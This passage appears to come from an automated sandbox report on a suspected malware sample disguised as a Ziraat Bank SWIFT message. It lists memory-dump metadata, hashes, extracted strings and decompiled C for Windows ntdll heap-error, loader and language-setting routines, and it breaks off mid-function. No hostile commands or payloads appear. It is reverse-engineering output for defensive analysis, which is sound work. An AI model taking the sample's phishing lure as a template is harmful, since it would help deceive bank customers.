                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: f854f4f61f11fcab0a62c53d2591c5e2f8f33e8ed5b09e9f8bd52f592797aa09
                                                                    • Instruction ID: e5d4f5baa23f44aa9ab1b3e73555c53bc8b987132d5c503df4eb93f1382bc8c2
                                                                    • Opcode Fuzzy Hash: f854f4f61f11fcab0a62c53d2591c5e2f8f33e8ed5b09e9f8bd52f592797aa09
                                                                    • Instruction Fuzzy Hash: 56E0CD741056806EC701DB348C44EC37FA4AF47360F15459EF9D55B202C5346210C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
                                                                    • Instruction ID: 2204a83720acbdedcfd9b4a204bbad34eb0b970d47639a0b49348e1640651e68
                                                                    • Opcode Fuzzy Hash: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
                                                                    • Instruction Fuzzy Hash: 1FB02B71D010C0C5D601D3B0060C7273A0077C0340F13C011D2024340B4338C194F2B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 0194B48F
                                                                    • The instruction at %p referenced memory at %p., xrefs: 0194B432
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0194B352
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0194B47D
                                                                    • This failed because of error %Ix., xrefs: 0194B446
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B3D6
                                                                    • *** then kb to get the faulting stack, xrefs: 0194B51C
                                                                    • The critical section is owned by thread %p., xrefs: 0194B3B9
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0194B53F
                                                                    • a NULL pointer, xrefs: 0194B4E0
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0194B305
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0194B2F3
                                                                    • *** enter .cxr %p for the context, xrefs: 0194B50D
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0194B39B
                                                                    • write to, xrefs: 0194B4A6
                                                                    • The resource is owned shared by %d threads, xrefs: 0194B37E
                                                                    • The instruction at %p tried to %s , xrefs: 0194B4B6
                                                                    • an invalid address, %p, xrefs: 0194B4CF
                                                                    • *** enter .exr %p for the exception record, xrefs: 0194B4F1
                                                                    • read from, xrefs: 0194B4AD, 0194B4B2
                                                                    • The resource is owned exclusively by thread %p, xrefs: 0194B374
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0194B476
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0194B484
                                                                    • Go determine why that thread has not released the critical section., xrefs: 0194B3C5
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0194B323
                                                                    • <unknown>, xrefs: 0194B27E, 0194B2D1, 0194B350, 0194B399, 0194B417, 0194B48E
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B38F
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0194B2DC
                                                                    • *** Inpage error in %ws:%s, xrefs: 0194B418
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0194B314
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
                                                                    • Instruction ID: 205864ddb034f3b507504d6cbdd9b0a0b3fbd801c9dd46eda507b7b73253c8bc
                                                                    • Opcode Fuzzy Hash: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
                                                                    • Instruction Fuzzy Hash: F1812735A41210FFEB216A4ACC85EBB3F2AAF96B52F014148F50D9B256D265C601D7B2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 44%
                                                                    			E01951C06() {
                                                                    				signed int _t27;
                                                                    				char* _t104;
                                                                    				char* _t105;
                                                                    				intOrPtr _t113;
                                                                    				intOrPtr _t115;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t119;
                                                                    				intOrPtr _t120;
                                                                    
                                                                    				_t105 = 0x18748a4;
                                                                    				_t104 = "HEAP: ";
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0189B150();
                                                                    				} else {
                                                                    					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push( *0x198589c);
                                                                    				E0189B150("Heap error detected at %p (heap handle %p)\n",  *0x19858a0);
                                                                    				_t27 =  *0x1985898; // 0x0
                                                                    				if(_t27 <= 0xf) {
                                                                    					switch( *((intOrPtr*)(_t27 * 4 +  &M01951E96))) {
                                                                    						case 0:
                                                                    							_t105 = "heap_failure_internal";
                                                                    							goto L21;
                                                                    						case 1:
                                                                    							goto L21;
                                                                    						case 2:
                                                                    							goto L21;
                                                                    						case 3:
                                                                    							goto L21;
                                                                    						case 4:
                                                                    							goto L21;
                                                                    						case 5:
                                                                    							goto L21;
                                                                    						case 6:
                                                                    							goto L21;
                                                                    						case 7:
                                                                    							goto L21;
                                                                    						case 8:
                                                                    							goto L21;
                                                                    						case 9:
                                                                    							goto L21;
                                                                    						case 0xa:
                                                                    							goto L21;
                                                                    						case 0xb:
                                                                    							goto L21;
                                                                    						case 0xc:
                                                                    							goto L21;
                                                                    						case 0xd:
                                                                    							goto L21;
                                                                    						case 0xe:
                                                                    							goto L21;
                                                                    						case 0xf:
                                                                    							goto L21;
                                                                    					}
                                                                    				}
                                                                    				L21:
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0189B150();
                                                                    				} else {
                                                                    					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push(_t105);
                                                                    				E0189B150("Error code: %d - %s\n",  *0x1985898);
                                                                    				_t113 =  *0x19858a4; // 0x0
                                                                    				if(_t113 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0189B150();
                                                                    					} else {
                                                                    						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0189B150("Parameter1: %p\n",  *0x19858a4);
                                                                    				}
                                                                    				_t115 =  *0x19858a8; // 0x0
                                                                    				if(_t115 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0189B150();
                                                                    					} else {
                                                                    						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0189B150("Parameter2: %p\n",  *0x19858a8);
                                                                    				}
                                                                    				_t117 =  *0x19858ac; // 0x0
                                                                    				if(_t117 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0189B150();
                                                                    					} else {
                                                                    						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0189B150("Parameter3: %p\n",  *0x19858ac);
                                                                    				}
                                                                    				_t119 =  *0x19858b0; // 0x0
                                                                    				if(_t119 != 0) {
                                                                    					L41:
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0189B150();
                                                                    					} else {
                                                                    						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					_push( *0x19858b4);
                                                                    					E0189B150("Last known valid blocks: before - %p, after - %p\n",  *0x19858b0);
                                                                    				} else {
                                                                    					_t120 =  *0x19858b4; // 0x0
                                                                    					if(_t120 != 0) {
                                                                    						goto L41;
                                                                    					}
                                                                    				}
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0189B150();
                                                                    				} else {
                                                                    					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				return E0189B150("Stack trace available at %p\n", 0x19858c0);
                                                                    			}











                                                                    0x01951c10
                                                                    0x01951c16
                                                                    0x01951c1e
                                                                    0x01951c3d
                                                                    0x01951c3e
                                                                    0x01951c20
                                                                    0x01951c35
                                                                    0x01951c3a
                                                                    0x01951c44
                                                                    0x01951c55
                                                                    0x01951c5a
                                                                    0x01951c65
                                                                    0x01951c67
                                                                    0x00000000
                                                                    0x01951c6e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01951c67
                                                                    0x01951cdc
                                                                    0x01951ce5
                                                                    0x01951d04
                                                                    0x01951d05
                                                                    0x01951ce7
                                                                    0x01951cfc
                                                                    0x01951d01
                                                                    0x01951d0b
                                                                    0x01951d17
                                                                    0x01951d1f
                                                                    0x01951d25
                                                                    0x01951d30
                                                                    0x01951d4f
                                                                    0x01951d50
                                                                    0x01951d32
                                                                    0x01951d47
                                                                    0x01951d4c
                                                                    0x01951d61
                                                                    0x01951d67
                                                                    0x01951d68
                                                                    0x01951d6e
                                                                    0x01951d79
                                                                    0x01951d98
                                                                    0x01951d99
                                                                    0x01951d7b
                                                                    0x01951d90
                                                                    0x01951d95
                                                                    0x01951daa
                                                                    0x01951db0
                                                                    0x01951db1
                                                                    0x01951db7
                                                                    0x01951dc2
                                                                    0x01951de1
                                                                    0x01951de2
                                                                    0x01951dc4
                                                                    0x01951dd9
                                                                    0x01951dde
                                                                    0x01951df3
                                                                    0x01951df9
                                                                    0x01951dfa
                                                                    0x01951e00
                                                                    0x01951e0a
                                                                    0x01951e13
                                                                    0x01951e32
                                                                    0x01951e33
                                                                    0x01951e15
                                                                    0x01951e2a
                                                                    0x01951e2f
                                                                    0x01951e39
                                                                    0x01951e4a
                                                                    0x01951e02
                                                                    0x01951e02
                                                                    0x01951e08
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01951e08
                                                                    0x01951e5b
                                                                    0x01951e7a
                                                                    0x01951e7b
                                                                    0x01951e5d
                                                                    0x01951e72
                                                                    0x01951e77
                                                                    0x01951e95

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                    • API String ID: 0-2897834094
                                                                    • Opcode ID: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
                                                                    • Instruction ID: 8c9ffb38db90a38c4d9460b832dd019b6840eddf2c8da517139ec14880fa2bb6
                                                                    • Opcode Fuzzy Hash: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
                                                                    • Instruction Fuzzy Hash: 3361D432925985DFE751FB89E484F2473A4EB04B21B0E843AF90DFB311D6649A44CB1B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 44%
                                                                    			E018C8E00(void* __ecx) {
                                                                    				signed int _v8;
                                                                    				char _v12;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr* _t32;
                                                                    				intOrPtr _t35;
                                                                    				intOrPtr _t43;
                                                                    				void* _t46;
                                                                    				intOrPtr _t47;
                                                                    				void* _t48;
                                                                    				signed int _t49;
                                                                    				void* _t50;
                                                                    				intOrPtr* _t51;
                                                                    				signed int _t52;
                                                                    				void* _t53;
                                                                    				intOrPtr _t55;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t52;
                                                                    				_t49 = 0;
                                                                    				_t48 = __ecx;
                                                                    				_t55 =  *0x1988464; // 0x772a0110
                                                                    				if(_t55 == 0) {
                                                                    					L9:
                                                                    					if( !_t49 >= 0) {
                                                                    						if(( *0x1985780 & 0x00000003) != 0) {
                                                                    							E01915510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                    						}
                                                                    						if(( *0x1985780 & 0x00000010) != 0) {
                                                                    							asm("int3");
                                                                    						}
                                                                    					}
                                                                    					return E018DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                    				}
                                                                    				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                    				_t43 =  *0x1987984; // 0x1442c70
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                    					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                    					if(_t48 == _t43) {
                                                                    						_t50 = 0x5c;
                                                                    						if( *_t32 == _t50) {
                                                                    							_t46 = 0x3f;
                                                                    							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                    								_t32 = _t32 + 8;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					_t51 =  *0x1988464; // 0x772a0110
                                                                    					 *0x198b1e0(_t47, _t32,  &_v12);
                                                                    					_t49 =  *_t51();
                                                                    					if(_t49 >= 0) {
                                                                    						L8:
                                                                    						_t35 = _v12;
                                                                    						if(_t35 != 0) {
                                                                    							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                    								E018C9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                    								_t35 = _v12;
                                                                    							}
                                                                    							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    					if(_t49 != 0xc000008a) {
                                                                    						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                    							if(_t49 != 0xc00000bb) {
                                                                    								goto L8;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					if(( *0x1985780 & 0x00000005) != 0) {
                                                                    						_push(_t49);
                                                                    						E01915510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                    						_t53 = _t53 + 0x1c;
                                                                    					}
                                                                    					_t49 = 0;
                                                                    					goto L8;
                                                                    				} else {
                                                                    					goto L9;
                                                                    				}
                                                                    			}




















                                                                    0x018c8e0f
                                                                    0x018c8e16
                                                                    0x018c8e19
                                                                    0x018c8e1b
                                                                    0x018c8e21
                                                                    0x018c8e7f
                                                                    0x018c8e85
                                                                    0x01909354
                                                                    0x0190936c
                                                                    0x01909371
                                                                    0x0190937b
                                                                    0x01909381
                                                                    0x01909381
                                                                    0x0190937b
                                                                    0x018c8e9d
                                                                    0x018c8e9d
                                                                    0x018c8e29
                                                                    0x018c8e2c
                                                                    0x018c8e38
                                                                    0x018c8e3e
                                                                    0x018c8e43
                                                                    0x018c8eb5
                                                                    0x018c8eb9
                                                                    0x019092aa
                                                                    0x019092af
                                                                    0x019092e8
                                                                    0x019092e8
                                                                    0x019092af
                                                                    0x018c8eb9
                                                                    0x018c8e45
                                                                    0x018c8e53
                                                                    0x018c8e5b
                                                                    0x018c8e5f
                                                                    0x018c8e78
                                                                    0x018c8e78
                                                                    0x018c8e7d
                                                                    0x018c8ec3
                                                                    0x018c8ecd
                                                                    0x018c8ed2
                                                                    0x018c8ed2
                                                                    0x018c8ec5
                                                                    0x018c8ec5
                                                                    0x00000000
                                                                    0x018c8e7d
                                                                    0x018c8e67
                                                                    0x018c8ea4
                                                                    0x0190931a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01909320
                                                                    0x018c8ea4
                                                                    0x018c8e70
                                                                    0x01909325
                                                                    0x01909340
                                                                    0x01909345
                                                                    0x01909345
                                                                    0x018c8e76
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 01909357
                                                                    • LdrpFindDllActivationContext, xrefs: 01909331, 0190935D
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0190932A
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 0190933B, 01909367
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 3446177414-3779518884
                                                                    • Opcode ID: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                                                                    • Instruction ID: 57f4519c4c79b1ce37f524deda989cc4fffb860143210e900c7f3b5bd96e751e
                                                                    • Opcode Fuzzy Hash: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                                                                    • Instruction Fuzzy Hash: 33411E31A803199FEB36AA5CC888A397764AB43F58F06416DE508D7192E770EF80CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E018A3D34(signed int* __ecx) {
                                                                    				signed int* _v8;
                                                                    				char _v12;
                                                                    				signed int* _v16;
                                                                    				signed int* _v20;
                                                                    				char _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				char _v36;
                                                                    				signed int _v40;
                                                                    				signed int _v44;
                                                                    				signed int* _v48;
                                                                    				signed int* _v52;
                                                                    				signed int _v56;
                                                                    				signed int _v60;
                                                                    				char _v68;
                                                                    				signed int _t140;
                                                                    				signed int _t161;
                                                                    				signed int* _t236;
                                                                    				signed int* _t242;
                                                                    				signed int* _t243;
                                                                    				signed int* _t244;
                                                                    				signed int* _t245;
                                                                    				signed int _t255;
                                                                    				void* _t257;
                                                                    				signed int _t260;
                                                                    				void* _t262;
                                                                    				signed int _t264;
                                                                    				void* _t267;
                                                                    				signed int _t275;
                                                                    				signed int* _t276;
                                                                    				short* _t277;
                                                                    				signed int* _t278;
                                                                    				signed int* _t279;
                                                                    				signed int* _t280;
                                                                    				short* _t281;
                                                                    				signed int* _t282;
                                                                    				short* _t283;
                                                                    				signed int* _t284;
                                                                    				void* _t285;
                                                                    
                                                                    				_v60 = _v60 | 0xffffffff;
                                                                    				_t280 = 0;
                                                                    				_t242 = __ecx;
                                                                    				_v52 = __ecx;
                                                                    				_v8 = 0;
                                                                    				_v20 = 0;
                                                                    				_v40 = 0;
                                                                    				_v28 = 0;
                                                                    				_v32 = 0;
                                                                    				_v44 = 0;
                                                                    				_v56 = 0;
                                                                    				_t275 = 0;
                                                                    				_v16 = 0;
                                                                    				if(__ecx == 0) {
                                                                    					_t280 = 0xc000000d;
                                                                    					_t140 = 0;
                                                                    					L50:
                                                                    					 *_t242 =  *_t242 | 0x00000800;
                                                                    					_t242[0x13] = _t140;
                                                                    					_t242[0x16] = _v40;
                                                                    					_t242[0x18] = _v28;
                                                                    					_t242[0x14] = _v32;
                                                                    					_t242[0x17] = _t275;
                                                                    					_t242[0x15] = _v44;
                                                                    					_t242[0x11] = _v56;
                                                                    					_t242[0x12] = _v60;
                                                                    					return _t280;
                                                                    				}
                                                                    				if(E018A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                    					_v56 = 1;
                                                                    					if(_v8 != 0) {
                                                                    						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                    					}
                                                                    					_v8 = _t280;
                                                                    				}
                                                                    				if(E018A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                    					_v60 =  *_v8;
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                    					_v8 = _t280;
                                                                    				}
                                                                    				if(E018A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                    					L16:
                                                                    					if(E018A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                    						L28:
                                                                    						if(E018A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                    							L46:
                                                                    							_t275 = _v16;
                                                                    							L47:
                                                                    							_t161 = 0;
                                                                    							L48:
                                                                    							if(_v8 != 0) {
                                                                    								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                    							}
                                                                    							_t140 = _v20;
                                                                    							if(_t140 != 0) {
                                                                    								if(_t275 != 0) {
                                                                    									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                    									_t275 = 0;
                                                                    									_v28 = 0;
                                                                    									_t140 = _v20;
                                                                    								}
                                                                    							}
                                                                    							goto L50;
                                                                    						}
                                                                    						_t167 = _v12;
                                                                    						_t255 = _v12 + 4;
                                                                    						_v44 = _t255;
                                                                    						if(_t255 == 0) {
                                                                    							_t276 = _t280;
                                                                    							_v32 = _t280;
                                                                    						} else {
                                                                    							_t276 = L018B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                    							_t167 = _v12;
                                                                    							_v32 = _t276;
                                                                    						}
                                                                    						if(_t276 == 0) {
                                                                    							_v44 = _t280;
                                                                    							_t280 = 0xc0000017;
                                                                    							goto L46;
                                                                    						} else {
                                                                    							E018DF3E0(_t276, _v8, _t167);
                                                                    							_v48 = _t276;
                                                                    							_t277 = E018E1370(_t276, 0x1874e90);
                                                                    							_pop(_t257);
                                                                    							if(_t277 == 0) {
                                                                    								L38:
                                                                    								_t170 = _v48;
                                                                    								if( *_v48 != 0) {
                                                                    									E018DBB40(0,  &_v68, _t170);
                                                                    									if(L018A43C0( &_v68,  &_v24) != 0) {
                                                                    										_t280 =  &(_t280[0]);
                                                                    									}
                                                                    								}
                                                                    								if(_t280 == 0) {
                                                                    									_t280 = 0;
                                                                    									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                    									_v44 = 0;
                                                                    									_v32 = 0;
                                                                    								} else {
                                                                    									_t280 = 0;
                                                                    								}
                                                                    								_t174 = _v8;
                                                                    								if(_v8 != 0) {
                                                                    									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                    								}
                                                                    								_v8 = _t280;
                                                                    								goto L46;
                                                                    							}
                                                                    							_t243 = _v48;
                                                                    							do {
                                                                    								 *_t277 = 0;
                                                                    								_t278 = _t277 + 2;
                                                                    								E018DBB40(_t257,  &_v68, _t243);
                                                                    								if(L018A43C0( &_v68,  &_v24) != 0) {
                                                                    									_t280 =  &(_t280[0]);
                                                                    								}
                                                                    								_t243 = _t278;
                                                                    								_t277 = E018E1370(_t278, 0x1874e90);
                                                                    								_pop(_t257);
                                                                    							} while (_t277 != 0);
                                                                    							_v48 = _t243;
                                                                    							_t242 = _v52;
                                                                    							goto L38;
                                                                    						}
                                                                    					}
                                                                    					_t191 = _v12;
                                                                    					_t260 = _v12 + 4;
                                                                    					_v28 = _t260;
                                                                    					if(_t260 == 0) {
                                                                    						_t275 = _t280;
                                                                    						_v16 = _t280;
                                                                    					} else {
                                                                    						_t275 = L018B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                    						_t191 = _v12;
                                                                    						_v16 = _t275;
                                                                    					}
                                                                    					if(_t275 == 0) {
                                                                    						_v28 = _t280;
                                                                    						_t280 = 0xc0000017;
                                                                    						goto L47;
                                                                    					} else {
                                                                    						E018DF3E0(_t275, _v8, _t191);
                                                                    						_t285 = _t285 + 0xc;
                                                                    						_v48 = _t275;
                                                                    						_t279 = _t280;
                                                                    						_t281 = E018E1370(_v16, 0x1874e90);
                                                                    						_pop(_t262);
                                                                    						if(_t281 != 0) {
